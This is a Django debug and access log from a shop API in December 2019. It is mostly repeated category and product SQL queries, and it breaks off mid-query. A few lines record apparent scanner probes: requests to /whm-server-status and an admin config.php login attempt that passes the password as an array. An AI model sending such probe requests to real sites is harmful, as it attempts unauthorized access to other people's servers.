10:19:57,894 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 10:19:57,899 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 10:19:57,905 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 10:19:57,910 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 10:19:57,914 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 10:19:57,918 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 10:19:57,922 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 10:19:57,930 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 10:19:57,934 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 10:19:57,939 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 10:19:57,943 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 10:19:57,948 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 10:19:57,955 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 10:19:57,958 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 10:19:57,961 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 10:19:57,963 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 10:19:57,965 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 10:19:57,968 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 10:19:57,971 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 10:19:57,974 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 10:19:57,977 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 10:19:57,980 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 10:19:57,982 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 10:19:57,986 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 10:19:57,988 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 10:19:57,991 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 10:19:57,994 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 10:19:57,997 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 10:19:57,999 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 10:19:58,002 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 10:19:58,004 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 10:19:58,007 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 10:19:58,010 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 10:19:58,012 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 10:19:58] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 10:20:10,385 utils 4252 140031721535232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 10:20:10,391 utils 4252 140031721535232 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 10:20:10] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-18 10:22:07,490 utils 4252 140031721535232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 10:22:07,497 utils 4252 140031721535232 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 10:22:07] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-18 10:22:09,391 utils 4252 140031721535232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 10:22:09,397 utils 4252 140031721535232 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 10:22:09] "GET /api/v1/fire/ HTTP/1.0" 200 482 [18/Dec/2019 10:24:28] "GET / HTTP/1.0" 302 0 [18/Dec/2019 10:29:31] "GET / HTTP/1.0" 302 0 [18/Dec/2019 10:34:33] "GET / HTTP/1.0" 302 0 [18/Dec/2019 10:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [18/Dec/2019 10:39:36] "GET / HTTP/1.0" 302 0 [18/Dec/2019 10:49:13] "GET / HTTP/1.0" 302 0 [18/Dec/2019 10:55:12] "GET / HTTP/1.0" 302 0 [18/Dec/2019 11:02:08] "GET / HTTP/1.0" 302 0 [18/Dec/2019 11:09:36] "GET / HTTP/1.0" 302 0 [18/Dec/2019 11:16:57] "GET / HTTP/1.0" 302 0 [18/Dec/2019 11:19:18] "GET / HTTP/1.0" 302 0 [18/Dec/2019 11:24:21] "GET / HTTP/1.0" 302 0 [18/Dec/2019 11:29:24] "GET / HTTP/1.0" 302 0 [18/Dec/2019 11:34:27] "GET / HTTP/1.0" 302 0 [18/Dec/2019 11:39:29] "GET / HTTP/1.0" 302 0 [18/Dec/2019 11:44:32] "GET / HTTP/1.0" 302 0 Not Found: /login/submit/only [18/Dec/2019 11:45:30] "GET /login/submit/only HTTP/1.0" 404 6471 [18/Dec/2019 11:49:35] "GET / HTTP/1.0" 302 0 Not Found: //admin/config.php [18/Dec/2019 11:49:53] "GET //admin/config.php?password%5B0%5D=ZIZO&username=admin HTTP/1.0" 404 6511 [18/Dec/2019 11:54:37] "GET / HTTP/1.0" 302 0 [18/Dec/2019 12:00:02] "GET / HTTP/1.0" 302 0 [18/Dec/2019 12:05:03] "GET / HTTP/1.0" 302 0 [18/Dec/2019 12:12:43] "GET / HTTP/1.0" 302 0 [18/Dec/2019 12:15:00] "GET / HTTP/1.0" 302 0 [18/Dec/2019 12:20:03] "GET / HTTP/1.0" 302 0 [18/Dec/2019 12:25:06] "GET / HTTP/1.0" 302 0 [18/Dec/2019 12:30:08] "GET / HTTP/1.0" 302 0 [18/Dec/2019 12:37:40] "GET / HTTP/1.0" 302 0 [18/Dec/2019 12:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [18/Dec/2019 12:42:43] "GET / HTTP/1.0" 302 0 [18/Dec/2019 12:47:46] "GET / HTTP/1.0" 302 0 [18/Dec/2019 12:55:56] "GET / HTTP/1.0" 302 0 [18/Dec/2019 13:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [18/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 13:07:09,049 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 13:07:09,056 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 13:07:09,060 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 13:07:09,062 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 13:07:09,065 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 13:07:09,068 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 13:07:09,070 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 13:07:09,072 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 13:07:09,075 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 13:07:09,078 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 13:07:09,080 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 13:07:09,082 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 13:07:09,085 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 13:07:09,087 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 13:07:09,090 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 13:07:09,093 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 13:07:09,095 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 13:07:09,097 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 13:07:09,099 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 13:07:09,103 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 13:07:09,105 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 13:07:09,108 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER 